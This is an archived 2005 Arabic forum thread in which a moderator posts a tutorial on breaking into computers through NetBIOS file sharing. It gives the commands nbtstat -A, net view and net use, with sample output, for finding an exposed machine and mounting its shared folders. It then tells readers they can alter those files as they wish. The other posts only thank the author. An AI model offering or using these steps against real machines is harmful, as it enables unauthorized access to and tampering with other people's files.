منتديات شبكة الجيل الجديد للتكنولوجيا
 
أقسام موقع ITNAT        
 
 
 

 
 

شاهد الدورات المتاحة الآن وصوت ماهي الدورة الأفضل بالنسبة لك،، اضغط هنا

 
 
 
العودة   ITNAT.COM Forums > الأرشيف > أرشيف منتدى ITNAT لغاية تاريخ 20 - 5 - 2008 > اخرى > منتدى الحماية وأمن المعلومات
تحديث الصفحة الإختراق عن طريق Netbios _ أصل الإختراق بدون باتش _

منتدى الحماية وأمن المعلومات هذا القسم يهتم بحماية المعلومات والسيرفرات وطرق تجنب الإختراقات، شبكات أو سيرفرات أو مواقع

رد
 
أدوات الموضوع طرق مشاهدة الموضوع
قديم 08-05-2005, 11:08 PM   #1
whisper
مجموعة إدارة
 
الصورة الرمزية whisper
 
تاريخ التسجيل: Sep 2004
المشاركات: 934
افتراضي الإختراق عن طريق Netbios _ أصل الإختراق بدون باتش _
بسم الله الرحمن الرحيم
موضوع اليوم : الإختراق عن طريق NetBios Attack

هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك الشخصى إذا كانت لديك تلك الثغرة.
وللتجربة على نفسك كمثال : إحصل على IP الخاص بجهازك بواسطة ذلك البرنامج الصغير المحمل في المرفقات مثلا .
1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى).

2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس .

3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER .

4- سيظهر لك الجدول التالى :
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
ملحوظة : تم حذف المعلومات الأصلية من الجدول .

5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن إستغلالها في إختراقه.

6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس:
Net view \\<insert ip_address here>

7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها :
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk

8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه :
Net use x: \\<insert IP address here>\temp

طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، بإذن الله سأقدم الطرق الأخرى الأكثر تطورا في وقت لاحق ..
تحياتي لكم
__________________
whisper غير متواجد حالياً  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 09-05-2005, 10:56 AM   #2
fmfm
مشرف إداري
 
الصورة الرمزية fmfm
 
تاريخ التسجيل: Mar 2005
المشاركات: 2,257
افتراضي الإختراق عن طريق Netbios _ أصل الإختراق بدون باتش _
مشكور مان .........

وبانتظار التكمله
__________________
fmfm
-----------------------------------------------------
fmfm غير متواجد حالياً  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 10-05-2005, 11:55 PM   #3
eng_ibr
مراقب عام
 
تاريخ التسجيل: Mar 2005
المشاركات: 912
افتراضي الإختراق عن طريق Netbios _ أصل الإختراق بدون باتش _
السلام عليكم
مشكور أخي الكريم
وجاري القراءة والتدقيق
__________________
اللهم صل وسلم وزد وبارك على سيدنا محمد وعلى آله وصحبه وسلم.....صلوا على النبي
منذ ولدت و أنت تفخر بالاسلام ..... فمتى يفخر الاسلام بك
إبراهيم eng_ibr
eng_ibr غير متواجد حالياً  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
قديم 29-10-2006, 05:03 PM   #4
الغرام
مدير شبكة
 
الصورة الرمزية الغرام
 
تاريخ التسجيل: Oct 2006
المشاركات: 397
افتراضي
الف شكر على الموضوع
الغرام غير متواجد حالياً  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
رد

« الموضوع السابق | الموضوع التالي »

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
طرق مشاهدة الموضوع
العرض العادي العرض العادي

تعليمات المشاركة
لا تستطيع كتابة مواضيع
لا تستطيع كتابة ردود
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة
الانتقال السريع إلى

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
KasperSky متاح لغاية 2010/03/11 Demor منتدى البرامج العام 29 11-07-2007 03:34 PM
اختراق جهاز الضحية بدون باتش عن طريق البورت 139 eng_ibr منتدى الحماية وأمن المعلومات 5 29-10-2006 05:30 PM
أمن النشر الإلكتروني E-Publishing Security whisper منتدى الحماية وأمن المعلومات 1 29-10-2006 04:56 PM
اصول الاختراق عن طريق الدوس !!!!! fmfm منتدى الحماية وأمن المعلومات 4 25-08-2005 04:02 PM

 
     
 
الساعة الآن: 02:21 PM

الاتصال بنا - www.itnat.com - الأرشيف - الأعلى

Powered by vBulletin® Version 3.6.7
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
حقوق الطبع محفوظة للجيل الجديد للتكنولوجيا
 

Copyright ©2008 ITNAT Networks, Inc. All rights reserved.
 

Search Engine Friendly URLs by vBSEO 3.1.0 ©2007, Crawlability, Inc.